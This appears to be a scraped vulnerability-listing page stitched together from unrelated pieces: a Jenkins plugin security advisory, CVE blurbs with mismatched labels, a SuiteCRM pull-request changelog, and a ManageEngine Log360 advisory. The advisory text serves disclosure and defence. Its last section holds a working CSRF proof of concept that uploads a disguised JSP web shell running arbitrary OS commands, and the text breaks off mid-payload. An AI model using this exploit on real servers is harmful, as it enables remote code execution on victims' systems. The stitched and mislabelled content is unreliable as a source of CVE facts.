A cross-site request forgery (CSRF) vulnerability in Jenkins Mailer Plugin 391.ve4a_38c1b_cf4b_ and earlier allows attackers to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Active Directory Plugin
*   Badge Plugin
*   batch task Plugin
*   Bitbucket Branch Source Plugin
*   Configuration as Code Plugin
*   Conjur Secrets Plugin
*   Credentials Binding Plugin
*   Debian Package Builder Plugin
*   Docker Commons Plugin
*   HashiCorp Vault Plugin
*   Mailer Plugin
*   Matrix Project Plugin
*   Metrics Plugin
*   Publish Over SSH Plugin
*   SSH Agent Plugin
*   Warnings Next Generation Plugin

**Descriptions****CSRF vulnerability in build triggers**

**SECURITY-2558 / CVE-2022-20612**

Jenkins 2.329 and earlier, LTS 2.319.1 and earlier does not require POST requests for the HTTP endpoint handling manual build requests when no security realm is set, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to trigger build of job without parameters.

Jenkins 2.330, LTS 2.319.2 requires POST requests for the affected HTTP endpoint.

**CSRF vulnerability and missing permission checks in Mailer Plugin**

**SECURITY-2163 / CVE-2022-20613 (CSRF), CVE-2022-20614 (missing permission check)**

Mailer Plugin 391.ve4a\_38c1b\_cf4b\_ and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to use the DNS used by the Jenkins instance to resolve an attacker-specified hostname.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Mailer Plugin 408.vd726a\_1130320 requires POST requests and Overall/Administer permission for the affected form validation method.

**Stored XSS vulnerability in Matrix Project Plugin**

**SECURITY-2017 / CVE-2022-20615**

Matrix Project Plugin 1.19 and earlier does not escape HTML metacharacters in node and label names, and label descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

Matrix Project Plugin 1.20 escapes HTML metacharacters in node and label names, and label descriptions.

**Missing permission check in Credentials Binding Plugin allows validating secret file credentials IDs**

**SECURITY-2342 / CVE-2022-20616**

Credentials Binding Plugin 1.27 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read access to validate if a credential ID refers to a secret file credential and whether it’s a zip file.

Credentials Binding Plugin 1.27.1 performs permission checks when validating secret file credentials IDs.

**OS command execution vulnerability in Docker Commons Plugin**

**SECURITY-1878 / CVE-2022-20617**

Docker Commons Plugin 1.17 and earlier does not sanitize the name of an image or a tag.

This results in an OS command execution vulnerability exploitable by attackers with Item/Configure permission or able to control the contents of a previously configured job’s SCM repository.

Docker Commons Plugin 1.18 sanitizes the name of an image or a tag.

**Missing permission checks in Bitbucket Branch Source Plugin allow enumerating credentials IDs**

**SECURITY-2033 / CVE-2022-20618**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in Bitbucket Branch Source Plugin 746.v350d2781c184 requires the appropriate permissions.

**CSRF vulnerability in Bitbucket Branch Source Plugin allows capturing credentials**

**SECURITY-2467 / CVE-2022-20619**

Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Bitbucket Branch Source Plugin 746.v350d2781c184 requires POST requests for the affected HTTP endpoint.

**Missing permission checks in SSH Agent Plugin allow enumerating credentials IDs**

**SECURITY-2189 / CVE-2022-20620**

SSH Agent Plugin 1.23 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read access to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in SSH Agent Plugin 1.23.2 requires the appropriate permissions.

**Access key stored in plain text by Metrics Plugin**

**SECURITY-1624 / CVE-2022-20621**

Metrics Plugin 4.0.2.8 and earlier stores access keys unencrypted in its global configuration file `jenkins.metrics.api.MetricsAccessKey.xml` on the Jenkins controller as part of its configuration.

This access key can be viewed by users with access to the Jenkins controller file system.

Metrics Plugin 4.0.2.8.1 stores access key encrypted once its configuration is saved again.

Additionally, the token value is only displayed once when it is generated.

**User passwords transmitted in plain text by Active Directory Plugin**

**SECURITY-1389 / CVE-2022-23105**

Active Directory Plugin implements two separate modes: integration with ADSI on Windows, and an OS agnostic LDAP-based mode.

Active Directory Plugin 2.25 and earlier does not encrypt the transmission of data between the Jenkins controller and Active Directory servers unless it is configured to use the OS agnostic LDAP mode and the system property `hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps` is set to `true`.

This allows attackers able to capture network traffic between the Jenkins controller and Active Directory servers to obtain credentials of users logging into Jenkins, as well as credentials of the manager DN (LDAP mode) or the Windows/Active Directory user Jenkins is running as (ADSI mode).

Active Directory Plugin 2.25.1 adds an option to only connect to Active Directory via TLS/SSL to both modes (ADSI and LDAP). This option is enabled by default for new installations and is now the recommended way to enforce TLS/SSL for connections to Active Directory. Unlike the existing StartTLS option for the LDAP-based mode, it will not proceed using an insecure connection if establishing a TLS/SSL connection fails.

Administrators upgrading from previous versions of the plugin will be shown a warning on the Jenkins UI requesting they update the plugin configuration unless the (now otherwise obsolete) flag `hudson.plugins.active_directory.ActiveDirectorySecurityRealm.forceLdaps` was set to `true`.

Note

The plugin exposes configuration of the ADSI flags implementing the TLS/SSL requirement via the system properties `hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_FLAGS_OVERRIDE` and `hudson.plugins.active_directory.ActiveDirectoryAuthenticationProvider.ADSI_PASSWORDLESS_FLAGS_OVERRIDE`. See the plugin documentation for further details.

Note

Care needs to be taken when reconfiguring the security realm to not accidentally lock yourself out. See the documentation for advice how to resolve this problem if it occurs.

**Non-constant time token comparison in Configuration as Code Plugin**

**SECURITY-2141 / CVE-2022-23106**

Configuration as Code Plugin 1.55 and earlier does not use a constant-time comparison when checking whether two authentication tokens are equal.

This could potentially allow attackers to use statistical methods to obtain a valid authentication token.

Configuration as Code Plugin 1.55.1 now uses a constant-time comparison when validating authentication tokens.

**Path traversal vulnerability in Warnings Next Generation Plugin**

**SECURITY-2090 / CVE-2022-23107**

Warnings Next Generation Plugin 9.10.2 and earlier does not restrict the name of a file when configuring a custom ID.

This allows attackers with Item/Configure permission to write and read specific files with a hard-coded suffix on the Jenkins controller file system.

Warnings Next Generation Plugin 9.10.3 checks for the presence of prohibited directory separator characters in the custom ID.

**Stored XSS vulnerability in Badge Plugin**

**SECURITY-2547 / CVE-2022-23108**

Badge Plugin allows adding custom build badges with a custom description and optionally a link to a URL.

Badge Plugin 1.9 and earlier does not escape the description and does not check for allowed protocols when creating a badge.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Badge Plugin 1.9.1 escapes the description and check for allowed protocols when creating a badge.

**Improper credentials masking in HashiCorp Vault Plugin**

**SECURITY-2213 / CVE-2022-23109**

Pipelines display commands executed in their Pipeline step descriptions and their output in build logs. To mask sensitive output, Pipeline: Groovy Plugin 2.84 and earlier specified an allowlist of known non-sensitive variables and masked everything else. This caused problems, so Pipeline: Groovy Plugin 2.85 and newer expects pipeline steps to explicitly specify that variables are to be treated as sensitive and should be removed from output.

HashiCorp Vault Plugin 3.7.0 and earlier relied on the previous behavior and did not explicitly declare variables as sensitive or redacted them.

This can result in exposure of Vault credentials in Pipeline build logs and Pipeline step descriptions.

HashiCorp Vault Plugin 3.8.0 explicitly masks Vault credentials in build logs and Pipeline step descriptions.

This fix only applies to new builds. Administrators are advised to review build logs and Pipeline metadata files created before HashiCorp Vault Plugin 3.8.0 for the presence of Vault credentials.

**Stored XSS vulnerability in Publish Over SSH Plugin**

**SECURITY-2287 / CVE-2022-23110**

Publish Over SSH Plugin 1.22 and earlier does not escape the SSH server name.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Overall/Administer permission.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in Publish Over SSH Plugin**

**SECURITY-2290 / CVE-2022-23111 (CSRF), CVE-2022-23112 (missing permission check)**

Publish Over SSH Plugin 1.22 and earlier does not perform permission checks in methods implementing connection tests.

This allows attackers with Overall/Read access to connect to an attacker-specified SSH server using attacker-specified credentials.

Additionally, these connection tests methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Path traversal vulnerability in Publish Over SSH Plugin**

**SECURITY-2307 / CVE-2022-23113**

Publish Over SSH Plugin 1.22 and earlier performs a validation of the file name specifying whether it is present or not.

This results in a path traversal vulnerability allowing attackers with Item/Configure permission to discover the name of the Jenkins controller files.

As of publication of this advisory, there is no fix.

**Password stored in plain text by Publish Over SSH Plugin**

**SECURITY-2291 / CVE-2022-23114**

Publish Over SSH Plugin 1.22 and earlier stores password unencrypted in its global configuration file `jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml` on the Jenkins controller as part of its configuration.

This password can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**CSRF vulnerability in batch task Plugin**

**SECURITY-1025 / CVE-2022-23115**

batch task Plugin 1.19 and earlier does not require POST requests for several HTTP endpoints, resulting in cross-site request forgery (CSRF) vulnerabilities.

These vulnerabilities allow attackers with Overall/Read access to retrieve logs, build or delete a batch task.

As of publication of this advisory, there is no fix.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows decrypting secrets**

**SECURITY-2522 (1) / CVE-2022-23116**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain the plain text of any attacker-provided encrypted secret.

This allows attackers able to control agent processes to decrypt secrets stored in Jenkins obtained through another method.

As of publication of this advisory, there is no fix.

**Agent-to-controller security bypass in Conjur Secrets Plugin allows retrieving all credentials**

**SECURITY-2522 (2) / CVE-2022-23117**

Conjur Secrets Plugin 1.0.9 and earlier implements functionality that allows agent processes to obtain all username/password credentials (Credentials Plugin) stored on the Jenkins controller.

This allows attackers able to control agent processes to retrieve those credentials.

As of publication of this advisory, there is no fix.

**Agent-to-controller security bypass in Debian Package Builder Plugin**

**SECURITY-2546 / CVE-2022-23118**

Debian Package Builder Plugin 1.6.11 and earlier implements functionality that allows agent processes to invoke command-line `git` at an attacker-specified path on the controller.

This allows attackers able to control agent processes to invoke arbitrary OS commands on the controller.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1025: Medium
*   SECURITY-1389: Medium
*   SECURITY-1624: Low
*   SECURITY-1878: High
*   SECURITY-2017: High
*   SECURITY-2033: Medium
*   SECURITY-2090: Medium
*   SECURITY-2141: Low
*   SECURITY-2163: Medium
*   SECURITY-2189: Medium
*   SECURITY-2213: Medium
*   SECURITY-2287: Medium
*   SECURITY-2290: Medium
*   SECURITY-2291: Low
*   SECURITY-2307: Medium
*   SECURITY-2342: Low
*   SECURITY-2467: High
*   SECURITY-2522 (1): Medium
*   SECURITY-2522 (2): Medium
*   SECURITY-2546: High
*   SECURITY-2547: High
*   SECURITY-2558: Medium

**Affected Versions**

*   Jenkins weekly up to and including 2.329
*   Jenkins LTS up to and including 2.319.1
*   **Active Directory Plugin** up to and including 2.25
*   **Badge Plugin** up to and including 1.9
*   **batch task Plugin** up to and including 1.19
*   **Bitbucket Branch Source Plugin** up to and including 737.vdf9dc06105be
*   **Configuration as Code Plugin** up to and including 1.55
*   **Conjur Secrets Plugin** up to and including 1.0.9
*   **Credentials Binding Plugin** up to and including 1.27
*   **Debian Package Builder Plugin** up to and including 1.6.11
*   **Docker Commons Plugin** up to and including 1.17
*   **HashiCorp Vault Plugin** up to and including 3.7.0
*   **Mailer Plugin** up to and including 391.ve4a\_38c1b\_cf4b\_
*   **Matrix Project Plugin** up to and including 1.19
*   **Metrics Plugin** up to and including 4.0.2.8
*   **Publish Over SSH Plugin** up to and including 1.22
*   **SSH Agent Plugin** up to and including 1.23
*   **Warnings Next Generation Plugin** up to and including 9.10.2

**Fix**

*   Jenkins weekly should be updated to version 2.330
*   Jenkins LTS should be updated to version 2.319.2
*   **Active Directory Plugin** should be updated to version 2.25.1
*   **Badge Plugin** should be updated to version 1.9.1
*   **Bitbucket Branch Source Plugin** should be updated to version 746.v350d2781c184
*   **Configuration as Code Plugin** should be updated to version 1.55.1
*   **Credentials Binding Plugin** should be updated to version 1.27.1
*   **Docker Commons Plugin** should be updated to version 1.18
*   **HashiCorp Vault Plugin** should be updated to version 3.8.0
*   **Mailer Plugin** should be updated to version 408.vd726a\_1130320
*   **Matrix Project Plugin** should be updated to version 1.20
*   **Metrics Plugin** should be updated to version 4.0.2.8.1
*   **SSH Agent Plugin** should be updated to version 1.23.2
*   **Warnings Next Generation Plugin** should be updated to version 9.10.3

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   batch task Plugin
*   Conjur Secrets Plugin
*   Debian Package Builder Plugin
*   Publish Over SSH Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2033, SECURITY-2522 (1), SECURITY-2522 (2), SECURITY-2546
*   **Devin Nusbaum, CloudBees, Inc.** for SECURITY-2467
*   **James Nord, CloudBees, Inc.** for SECURITY-2141
*   **Jasen Minton** for SECURITY-2213
*   **Kevin Guerroudj** for SECURITY-2287
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2547
*   **Kevin Guerroudj, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2558
*   **Kevin Guerroudj, Justin Philip and Marc Heyries** for SECURITY-2307
*   **Marc Heyries, Justin Philip and Kevin Guerroudj** for SECURITY-2290, SECURITY-2291
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-2163
*   **Oleg Nenashev** for SECURITY-1025
*   **Tomasz Szuba** for SECURITY-1878
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2017, SECURITY-2090
*   **Wasin Saengow** for SECURITY-1624

CVE-2022-20613: Jenkins Security Advisory 2022-01-12

Jenkins Matrix Project Plugin 1.19 and earlier does not escape HTML metacharacters in node and label names, and label descriptions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

CVE-2022-20615: Jenkins Security Advisory 2022-01-12

SuiteCRM through 7.11.21 is vulnerable to CSRF, with resultant remote code execution, via the UpgradeWizard functionality, if a PHP file is included in a ZIP archive.

*   PR: 7198 - Add Robo API commands
    
*   PR: 5464 - Filter email templates on Events
    
*   PR: 7829 - Issue: 7828 - Robo tasks for common actions that are performed in Repair Administration module
    
*   PR: 7819 - Issue: 7817 - Added option to filter WorkFlows by module name
    
*   PR: 7809 - Robo: Add a --filter option to tests:unit for filtering tests
    
*   PR: 7808 - Issue: 7621 - Add support for config\_override.test.php
    
*   PR: 7844 - SuiteP: Add html data tags to allow module and field identification
    
*   PR: 7837 - Issue: 7836 - Robo task to compile css in a custom theme
    
*   PR: 7834 - Workflow: Properly delete records which are marked as deleted
    

*   PR: 8154 - Issue: 8153 - SQL query in the ACLAction code
    
*   PR: 8151 - Resolve issue with email templates
    
*   PR: 7659 - Icons not rendering properly in Alerts
    
*   PR: 7655 - Issue: 7648 - Case Module: Description field not showing after Save and continue
    
*   PR: 7650 - 'customMetadate' typo in DashletGeneric.php
    
*   PR: 7643 - Issue: 7622 - Make the code:coverage Robo command work outside of CI
    
*   PR: 7641 - Issue: 7396 - Update button clears DateTime parameter in Reports Module
    
*   PR: 7638 - Issue: 7315 - Adding parameter date field in Reports module causes error in Browser console
    
*   PR: 7627 - Update sugar\_3.js to fix a MassUpdate undefined error
    
*   PR: 7587 - Issue: 7586 - Unnecessary include in UserService
    
*   PR: 7529 - Codacy
    
*   PR: 7525 - API Create Relationship via Link
    
*   PR: 7515 - Scheduled Reports: Fix report name relation and popup search
    
*   PR: 7428 - Issue: 7427 - Show logs lines that was made by anonymous
    
*   PR: 7195 - Inspections compatibility
    
*   PR: 7193 - Remove Unused Import
    
*   PR: 7141 - Type casting
    
*   PR: 6765 - Issue: 321 - Hitting enter in the password input saves the user but not the password
    
*   PR: 6503 - Add a SAML2 metadata endpoint
    
*   PR: 5537 - Issue: 5520 - Do not clear existing attachments when loading a template
    
*   PR: 4471 - Update DeleteRelationship.php
    
*   PR: 3820 - search\_by\_module REST API
    
*   PR: 7826 - Issue: 2825 - Now we translate the title tag for recently viewed links
    
*   PR: 7822 - Issue: 7821 - User name is not aligned in 1200px to 1600px screens
    
*   PR: 7818 - InboundEmailTest: Make tests independent to make them work with the state checker
    
*   PR: 7816 - Removing an item from subpanel should only require the item edit access right
    
*   PR: 7815 - Save email addresses before saving company/person
    
*   PR: 7814 - SQL query bug for quote purchase subpanel
    
*   PR: 7813 - Issue: 7810 - Pencil present in Top Menu for users with non editing permission
    
*   PR: 7802 - Issue: 6830 - Code coverage as a separate stage in CI
    
*   PR: 7797 - Issue: 7779 - PHP Fatal error in modules/Connectors
    
*   PR: 7783 - Issue: 7780 - Bad css format in Date and Date Range Inputs in search forms
    
*   PR: 7782 - Issue: 7781 - Now we can compile SuiteP only one color\_scheme
    
*   PR: 7777 - Issue: 7784 - Grouping by with xxx\_usdollar currency fields
    
*   PR: 7774 - EmailMarketing: Add security groups support
    
*   PR: 7773 - Make robo test commands fail if tests fail
    
*   PR: 7771 - Issue: 7620 - Add dotenv support for the test environment
    
*   PR: 7762 - Issue: 7761 - htaccess issue
    
*   PR: 7760 - SugarEmail: Fix 'to' field not being filled when the last record doesn’t have an email
    
*   PR: 7746 - Issue: 7675 - Add a function to compare properly indices definitions
    
*   PR: 7741 - Clean up a bunch of unit tests
    
*   PR: 7711 - Issue: 2928 - Clear Zend OPcache when writing files
    
*   PR: 7690 - Composerify Zend Lucene
    
*   PR: 7906 - Update Gitattributes + codeception.dist.yml
    
*   PR: 7904 - Issue: 7903 - Verify if $bean is\_subclass\_of SugarBean so we can check access
    
*   PR: 7900 - Issue: 7869 - Protect against illegal string offset warnings in aow\_utils
    
*   PR: 7899 - Issue: 7868 - 'Undefined index: leads\_id' notices in AOR\_Report.php
    
*   PR: 7898 - Issue: 7552 - AOR Reports - Mysqli\_query failed when execute Report as normal User
    
*   PR: 7892 - Issue: 5652 - Ending spaces in language strings
    
*   PR: 7877 - Issue: 7875 - Wrong render in DateRangeInput using 'Between' Option
    
*   PR: 7871 - Issue: 7870 - Improvements in css for date\_input and labels in EditView
    
*   PR: 7865 - Refixed #7393 without breaking headers for non-pulldown fields
    
*   PR: 7866 - Issue: 6535 - Replace contact\_xxx in templates also for leads/prospects/users
    
*   PR: 7864 - Issue: 7642 - Replace Title with Job Title
    
*   PR: 7858 - Issue: 6442 - Fix Issue when importing non UTF-8 CSV file
    
*   PR: 7857 - Issue: 7848 - Temporarily revert PHP 5.5 from the Travis build
    
*   PR: 7855 - Issue: 7613 - Status/State usage causing translation errors
    
*   PR: 7853 - Issue: 7848 - Move the PHP 5.6 job to xenial
    
*   PR: 7847 - Issue: 6012 - Emails being sent from 'Root User'
    
*   PR: 7841 - Update issue 'Undefined index: docType' PHP notice PR templates to comment on how to include code
    
*   PR: 7839 - Issue: 7838 - 'Undefined index: docType' PHP notice
    
*   PR: 7833 - SugarFeed: Various fixes for 7.10.19/20 regressions
    
*   PR: 7965 - Issue: 7964 - Report Total Field formatting is inconsistent
    
*   PR: 7963 - Issue: 7962 - Sending emails with apostrophe in email address
    
*   PR: 7959 - Issue: 3860 - Fix typo in InboundEmail.php
    
*   PR: 7957 - Silent upgrade
    
*   PR: 7956 - Issue: 7955 - Admin blank screen post upgrade to 7.11.8
    
*   PR: 7952 - Update the .gitattributes export-ignore list
    
*   PR: 7951 - Issue: 6691 - Typo in key - LBL\_ORIGINAL\_MESSAGE\_SEPERATOR
    
*   PR: 7950 - Issue: 7926 - Do not divide by adjustment if it equals 0
    
*   PR: 7944 - Issue: 3129 - Use correct Business Hours field name for opening hours check
    
*   PR: 7943 - Issue: 7942 - Add bool to eligible fields for merging
    
*   PR: 7930 - Typos in audit template metadata
    
*   PR: 7929 - Issue: 7928 - Upgrade wizard recommends composer update instead of composer install
    
*   PR: 7925 - Enable Delete button in Actions menu
    
*   PR: 7924 - Issue: 7923 - Verify the variable is an array
    
*   PR: 7922 - Issue: 7880 - InboundEmail mime parser
    
*   PR: 7918 - Issue: 7917 - Issue with french translation
    
*   PR: 7913 - Issue: 7912 - Avoid PHP Notices in getVardefs() method
    
*   PR: 7910 - Issue: 7885 - Add a SECURITY.md to the repository
    
*   PR: 7909 - htaccess
    
*   PR: 8039 - Misc improvements to the acceptance tests
    
*   PR: 8032 - Issue: 3857 - Retain date properly when saving a stored query
    
*   PR: 8031 - Issue: 7758 - Disable Action menu has no effect on menus in subpanel
    
*   PR: 8030 - Issue: 7738 - Email Template selection in email module is not working in Edge/IE11
    
*   PR: 8029 - Updated mkdir calls to throw RuntimeExceptions
    
*   PR: 8028 - Issue: 7874 - Unable to use custom \_head.tpl file
    
*   PR: 8027 - Issue: 7882 - No 'Server response time' in SuiteP
    
*   PR: 8026 - Issue: 8025 - OAuth Keys Fixed a grammatical error in include/templates/Template.php OAuth2 Clients and Tokens icons are missing
    
*   PR: 8020 - Fixed a grammatical error in include/templates/Template.php
    
*   PR: 8018 - Move RebuildConfig.php from using XTemplate to using Smarty
    
*   PR: 8015 - Make the pagination buttons on DetailView pages links.
    
*   PR: 8010 - Skip cache building if custom class exists for dashlets
    
*   PR: 8009 - Update contributing.md
    
*   PR: 7998 - Issue: 7997 - Datetime field caching issue
    
*   PR: 7995 - Typos and made it grammatically better
    
*   PR: 7994 - Update config.yml to include 7.10.x branch
    
*   PR: 7990 - AOW\_WorkFlow: Delete all related beans when deleting a workflow
    
*   PR: 7989 - BeanFactory: Don’t return deleted beans from the cache
    
*   PR: 7986 - Updated LoggerManager to use @method + code cleanup
    
*   PR: 7981 - Issue: 5709 - Paths to milestone image
    
*   PR: 7978 - Issue: 7971 - Textarea in EditView overlaps other fields
    
*   PR: 7976 - Replace deprecated array index accessors
    
*   PR: 7970 - Issue: 7969 - Cannot call logger
    
*   PR: 7966 - Email css error
    
*   PR: 8086 - Link contributors badge to contributors insights
    
*   PR: 8076 - Issue: 8057 - Deprecated usage of join
    
*   PR: 8075 - Issue: 8057 - Misc PHP 7.4 deprecations
    
*   PR: 8073 - Issue: 8057 - Remove all uses of get\_magic\_quotes\_gpc
    
*   PR: 8068 - Issue: 7764 - Undefined index: server\_unique\_key
    
*   PR: 8067 - Added the deprecated lowercase v8 API to codecov ignore list
    
*   PR: 8064 - Issue: 8063 - Change isset() to !empty()
    
*   PR: 8061 - Issue: 6314 - Unused language strings in ver. 7.10.8
    
*   PR: 8060 - Issue: 7987 - Apache log
    
*   PR: 8059 - Added a check for SUGARCRM restrictions in htaccess
    
*   PR: 8058 - Issue: 8057 - Deprecated usages of implode
    
*   PR: 8056 - Issue: 7128 - Remove scheme to avoid mixed content error
    
*   PR: 8054 - Improve footer styling for new stats item
    
*   PR: 8051 - Issue: 7397 - Implement Refresh Token Grant
    
*   PR: 8050 - Issue: 8001 - Non-distinct person entries for each meeting/call invited to
    
*   PR: 8049 - Header cleanup
    
*   PR: 8041 - Remove BusinessCard-related code
    

*   PR: 8000 - More PHP 7.4 array accessor deprecations
    
*   PR: 6750 - Issue: 4754 - Remove PHP4 style constructors
    
*   PR: 8085 - Deprecated string concatenation
    
*   PR: 8080 - Replaced alias functions
    

_Special thanks to the following members for their contributions and participation in this release!_

To report any security issues please follow our Security Process and send them directly to us via email security@suitecrm.com

CVE-2021-41597: 7.10.x Releases

Zoho ManageEngine O365 Manager Plus before Build 4416 allows remote code execution via BCP file overwrite through the ChangeDBAPI component.

CVE-2021-44652: Microsoft 365 management, reporting, and auditing - ManageEngine M365 Manager Plus

Zoho ManageEngine CloudSecurityPlus before Build 4117 allows remote code execution through the updatePersonalizeSettings component due to an improper security patch for CVE-2021-40175.

03 Dec 2021

Zoho ManageEngine CloudSecurityPlus before Build 4117 allows execution of arbitrary code via security misconfiguration.  

****Identifiers****

*   ZVE-2021-2019

****Affected Products & Versions****

*   CloudSecurityPlus - 4.1.1.7
*   Log360 - 5.2.2

****Affected Instance(s)****

*   /WC/ADSPersonalize.do?mTCall=updatePersonalizeSettings

****Advisory URL****

*   Not Available from Vendor

****Technical details****

It was observed that, to fix the CVE-2021-40175 issue, the security configurations gets applied to url paths only but not on the struts action of the affected endpoint. This allows an attacker to bypass the mitigations applied for CVE-2021-40175 issue, there by executing arbitrary code by uploading malicious files.

****Impact**:**

The impact in this case is 1-click RCE, as the affected endpoints reqiured for exploitation lacks CSRF protection as well.

****Root Cause Analysis**:**

In the following code-snippets from `security.xml` file, observe that the application applies custom security configuration via URL paths.

      <url path="/RestAPI/WC/ADSPersonalize" duration="1" threshold="10" lock-period="1" method="get,post" dynamic-params="true" csrf="true">
        <file name="LOGO_PATH" content-type-name="image" max-size="5000" allowed-extensions="gif,jpeg,jpg,png,bmp">
            <filename regex="customFileNameFilter" max-len="255" />
        </file>
        <file name="FAVICON_PATH" content-type-name="image" max-size="5000" allowed-extensions="ico">
            <filename regex="customFileNameFilter" max-len="255" />
        </file>
        <param name="BROWSER_TITLE" type="String" max-len="-1" />
      </url>
    

The above configuration can bypassed by accessing the struts action route directly.

****Exploitation**:**

Following POC exploit code when executed will write a jsp file under `http://<endpoint_ip>/images/adsf/common/logos/` folder.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <script>
          function submitRequest()
          {
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "http:\/\/log360server\/WC\/ADSPersonalize.do?mTCall=updatePersonalizeSettings", true);
            xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
            xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
            xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14802732823662");
            xhr.withCredentials = true;
            var body = "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"LOGO_PATH\"; filename=\"shell.jpg.jsp\"\r\n" + 
              "Content-Type: image/jpeg\r\n" + 
              "\r\n" + 
              "\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x01,\x01,\x00\x00\xff\xe1\x00fExif\x00\x00MM\x00*\x00\x00\x00\x08\x00\x04\x01\x1a\x00\x05\x00\x00\x00\x01\x00\x00\x00\x3e\x01\x1b\x00\x05\x00\x00\x00\x01\x00\x00\x00F\x01(\x00\x03\x00\x00\x00\x01\x00\x02\x00\x00\x011\x00\x02\x00\x00\x00\x10\x00\x00\x00N\x00\x00\x00\x00\x00\x00\x01,\x00\x00\x00\x01\x00\x00\x01,\x00\x00\x00\x01paint.ne\x84\xff\x00\xf0\xc3\xdf\xf0\x8f\x7f\xc2\xcf\xf8\x0f\xf1\x7f\xe1\xe7\xf6\xff\x00\xfc4\xb7\xf6\xb7\xf6\x1f\xfc&\xbf\x0f\xbcC\xe1\xaf\xed\x8f\xec\xaf\xf8P\x1ag\xf6\x9f\xf6g\xf6\x9f\xdb\x7f\xb3\xff\x00\xb4\xb4\xff\x00\xb6y\x1ff\xfbm\xa7\x99\xe7\xc6P\x07\xff\xd9\r\n" + 
              "\x3c%@ page import=\"java.util.*,java.io.*\"%\x3e\r\n" + 
              "\x3c%\r\n" + 
              "%\x3e\r\n" + 
              "\x3cHTML\x3e\x3cBODY\x3e\r\n" + 
              "Commands with JSP\r\n" + 
              "\x3cFORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\"\x3e\r\n" + 
              "\x3cINPUT TYPE=\"text\" NAME=\"cmd\"\x3e\r\n" + 
              "\x3cINPUT TYPE=\"submit\" VALUE=\"Send\"\x3e\r\n" + 
              "\x3c/FORM\x3e\r\n" + 
              "\x3cpre\x3e\r\n" + 
              "\x3c%\r\n" + 
              "if (request.getParameter(\"cmd\") != null) {\r\n" + 
              "    out.println(\"Command: \" + request.getParameter(\"cmd\") + \"\x3cBR\x3e\");\r\n" + 
              "    Process p;\r\n" + 
              "    if ( System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\r\n" + 
              "        p = Runtime.getRuntime().exec(\"cmd.exe /C \" + request.getParameter(\"cmd\"));\r\n" + 
              "    }\r\n" + 
              "    else{\r\n" + 
              "        p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n" + 
              "    }\r\n" + 
              "    OutputStream os = p.getOutputStream();\r\n" + 
              "    InputStream in = p.getInputStream();\r\n" + 
              "    DataInputStream dis = new DataInputStream(in);\r\n" + 
              "    String disr = dis.readLine();\r\n" + 
              "    while ( disr != null ) {\r\n" + 
              "    out.println(disr);\r\n" + 
              "    disr = dis.readLine();\r\n" + 
              "    }\r\n" + 
              "}\r\n" + 
              "%\x3e\r\n" + 
              "\x3c/pre\x3e\r\n" + 
              "\x3c/BODY\x3e\x3c/HTML\x3e\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"BROWSER_TITLE\"\r\n" + 
              "\r\n" + 
              "ManageEngine Log360\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"FAVICON_PATH\"; filename=\"\"\r\n" + 
              "Content-Type: application/octet-stream\r\n" + 
              "\r\n" + 
              "\r\n" + 
              "-----------------------------14802732823662\r\n" + 
              "Content-Disposition: form-data; name=\"ENABLE_FORGOT_PWD\"\r\n" + 
              "\r\n" + 
              "true\r\n" + 
